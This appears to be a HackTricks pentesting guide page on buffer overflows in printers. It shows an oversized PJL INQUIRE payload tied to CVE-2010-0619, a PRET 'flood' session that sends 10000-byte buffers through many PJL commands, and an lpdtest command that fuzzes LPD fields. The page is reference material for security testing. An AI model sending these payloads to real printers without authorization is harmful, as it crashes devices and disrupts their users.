hacktricks/pentesting/pentesting-printers/buffer-overflows.md

2.2 KiB

Buffer Overflows

PJL

Various_ Lexmark_ laser printers crash when when receiving about 1.000 characters as the INQUIRE argument (see CVE-2010-0619) and sending about 3.000 characters as the SET argument to the Dell 1720n crashes the device:

@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…

You can check for Buffer Overflows using PRET:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

LPD daemon

It allows multiple user-defined vectors like_ jobname, username or hostname_, which may not be sufficiently protected. Several vulnerabilities related to this malfunction has been already discovered.

A simple LPD fuzzer to test for buffer overflows can be created using the lpdtest tool **included **in PRET. The in argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):

./lpdtest.py printer in "`python -c 'print "x"*150'`"

You can find more information about these attacks in http://hacking-printers.net/wiki/index.php/Buffer_overflows